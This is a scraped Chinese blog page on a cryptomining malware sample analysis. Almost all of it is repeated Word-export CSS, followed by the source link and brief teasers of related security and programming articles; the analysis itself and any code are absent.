mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

p.pre{
mso-style-name:"HTML 预设格式";
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
font-family:宋体;
font-size:12.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@font-face{
font-family:"Consolas";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

p.pre{
mso-style-name:"HTML 预设格式";
mso-style-noshow:yes;
margin:0pt;
margin-bottom:.0001pt;
font-family:宋体;
font-size:12.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

@list l0:level1{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%1)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:21.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level2{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%2)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:42.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level3{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%3.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:63.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level4{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%4.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:84.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level5{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%5)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:105.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level6{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%6.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:126.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level7{
mso-level-number-format:decimal;
mso-level-suffix:tab;
mso-level-text:"%7.";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:147.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level8{
mso-level-number-format:alpha-lower;
mso-level-suffix:tab;
mso-level-text:"%8)";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:168.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

@list l0:level9{
mso-level-number-format:lower-roman;
mso-level-suffix:tab;
mso-level-text:"%9.";
mso-level-tab-stop:none;
mso-level-number-position:right;
margin-left:189.0000pt;text-indent:-21.0000pt;font-family:‘Times New Roman‘;}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}
@font-face{
font-family:"Times New Roman";
}

@font-face{
font-family:"宋体";
}

@font-face{
font-family:"Arial";
}

p.MsoNormal{
mso-style-name:正文;
mso-style-parent:"";
margin:0pt;
margin-bottom:.0001pt;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:12.0000pt;
}

p.15{
mso-style-name:正文(绿盟科技);
margin:0pt;
margin-bottom:.0001pt;
line-height:125%;
font-family:Arial;
mso-fareast-font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:10.5000pt;
}

p.MsoHeader{
mso-style-name:页眉;
margin:0pt;
margin-bottom:.0001pt;
border-bottom:1.0000pt solid windowtext;
mso-border-bottom-alt:0.7500pt solid windowtext;
padding:0pt 0pt 1pt 0pt ;
layout-grid-mode:char;
text-align:center;
line-height:150%;
font-family:宋体;
mso-bidi-font-family:‘Times New Roman‘;
font-size:9.0000pt;
}

span.msoIns{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:underline;
text-underline:single;
color:blue;
}

span.msoDel{
mso-style-type:export-only;
mso-style-name:"";
text-decoration:line-through;
color:red;
}
@page{mso-page-border-surround-header:no;
mso-page-border-surround-footer:no;}@page Section0{
}
div.Section0{page:Section0;}

原文地址:https://www.cnblogs.com/A66666/p/5bac0905ef9d9f470a0d279a83165789.html

时间: 2024-10-25 23:04:05

一个挖矿样本分析的相关文章

一个利用“永恒之蓝”漏洞传播的挖矿程序分析

背景介绍 近日,渔村安全团队追踪到一个利用永恒之蓝漏洞传播的挖矿程序,其具备高度的模块化和较强的传播能力,在短短数日就感染了数万台用户电脑.针对该突发情况,渔村安全团队迅速组织应急工作,最终使得目前的感染情况受到控制,下文为样本分析. 感染量 从微软发布ms17-010(永恒之蓝漏洞) 的修复补丁到现在已经过去四个月了,相继爆发的利用该漏洞传播的WannaCry,Petya 勒索病毒更是给 我们 上了一课.但目前来看,还是有不少用户没有及时更新补丁或者做相应的缓解措施,同时 Shadow Bro

看看影音恶意挖矿行为分析

看看影音恶意挖矿行为分析 近日,部分用户出现电脑GPU占用率高,电脑温度升高,风扇噪声增大等问题.具体现象为电脑中C盘可使用空间骤降,且在C盘Ethash文件夹内,发现存在大量的1G左右的垃圾文件:电脑闲置状态时,风扇转速增快,电脑发热增加,GPU使用率达到100%.非闲置状态时,恢复正常.经过远程调试分析发现是看看影音在后台偷偷利用用户电脑的运算资源进行以太币(一种类似比特币的数字货币)挖矿导致. [看看影音的版本和公司信息] 安装看看影音后,会注册组件%APP_DATA%\Video Leg

用node.js对一个英语句子分析页面进行一个小爬虫

最近遇到一个需求,就是要从一个英语句子分析的页面中,根据你输入的英语从句,点击开始分析按钮,这个页面就会将分析的结果解析出来,如 然后我们就是需要从这个页面中把这些解析好的数据(包括句子语法结构详解,句子相关词汇解释等)取出来,这时候我就想到之前学过node.js,这时候就来弄下node.js的小小的爬虫. 首先,电脑要先安装node.js,至于怎么安装,请google,或者找相关教程来看. 然后就需要了解下node,现在我先加载http模块,然后设置url的值,url就是你要爬的那个网页的地址

201310-安卓收集用户信息样本分析-willj[4st TeAm]

报告更新日期: 2013-10-14 样本发现日期: 2013-01-22 样本类型: Android 样本文件大小/被感染文件变化长度: 1.15 MB (1,209,713 字节) 样本文件MD5 校验值: 001769fd059d829a568b4196f07c6df9 壳信息:无 可能受到威胁的系统: Android OS 已知检测名称: Win32.Backdoor.Ginmaster.x 作者:willJ 简介 该样本为伪装成Android游戏盗取用户信息,病毒推广APP的木马. 详

阿庆SQL智能查询分析器,使用delphi开发的一个数据库查询分析管理工具.分享给大家

为方便自己工作,使用delphi开发的一个数据库查询分析管理工具.分享给大家,具体以下特点: 1.由于使用ADO连接,理论支持SQL Server.Access.MySQL.Oracle等所有数据库 2.支持SQL关键词自动提示 3.支持表名自动提示 4.支持表字段自动提示 5.支持SQ关键词.表名.表字段不同颜色显示 6.支持SQL语句注释(包括ACCESS) 7.支持选择部分文字执行SQL语句 8.查询结果支持增加.修改.编辑 9.绿色程序无附加文件,只有一个文件即可运行,文件大小只有400

如何在现有复杂网络上建立隔离网提供病毒样本分析,且不蔓延内网。

目前安全厂家及安全公司都有病毒样本分析及恶意程序分析的研究的必要性,大家都采用的大同小异的方式. 各位安全研究员先生无关乎用了以下几种方式,我讲的几种方式中还有几种至少博主所在的公司人不了解还没有在用,言归正传,为了下文的正式展开我先列举当前研究的几种方式: 一.利用杀软的隔离区 缺点:如果内容太多,大约有50个G,用虚拟磁盘不太现实,用杀软的隔离区更不行.我想补充如下几点问题:1.如用虚拟机,我会选择在虚拟机中装linux系统,再把病毒放进去.那么文件太多,整理.传输太慢,调用也不方便(如果不

《2018年云上挖矿态势分析报告》发布,非Web类应用安全风险需重点关注

近日,阿里云安全团队发布了<2018年云上挖矿分析报告>.该报告以阿里云2018年的***数据为基础,对恶意挖矿态势进行了分析,并为个人和企业提出了合理的安全防护建议. 报告指出,尽管加密货币的价格在2018年经历了暴跌,但挖矿仍是网络黑产团伙在***服务器之后最直接的变现手段,越来越多的0-Day/N-Day漏洞在公布后的极短时间内就被用于***挖矿,黑产团伙利用漏洞发起***进行挖矿的趋势仍将持续. 以下是报告部分内容,下载报告完整版:https://yq.aliyun.com/downl

linux xorddos样本分析2

逆向分析 之后我们通过ida对该样本进行更深入的分析样本的main函数中,一开始会调用函数dec_conf对样本中的大量加密的字符串进行解密,如下图所示. 而函数dec_conf中实际调用了encrypt_code函数进行实际的解密,解密的操作为按位进行xor操作. 以此可以通过脚本对样本中的字符解密,解密之后部本分结果如下图代码中的注释所示,包含了样本运行中会使用到的目录. 此处为目标解密之后的目标域名. 解密之后的目标ip. 之后根据main传入的参数个数,样本分别运行三个状态 当argc参

idapython在样本分析中的使用-字符解密

最近接手的一个样本,样本中使用了大量的xor加密,由于本身样本不全,无法运行(好吧我最稀饭的动态调试没了,样本很有意思,以后有时间做票大的分析),这个时候就只好拜托idapython大法了(当然用idc也一样),期间遇到几个问题,遂记录一番. 样本加密的字符如下,很简单,push压栈之后,反复调用sub_1000204D解密. 此时,要写脚本的话,我们希望这个脚本能够足够通用,通常样本中的加密都是由一个函数实现,函数本身实现解密,传入的参数通常是解密字符,和key两个参数(当然肯定也有其他的模式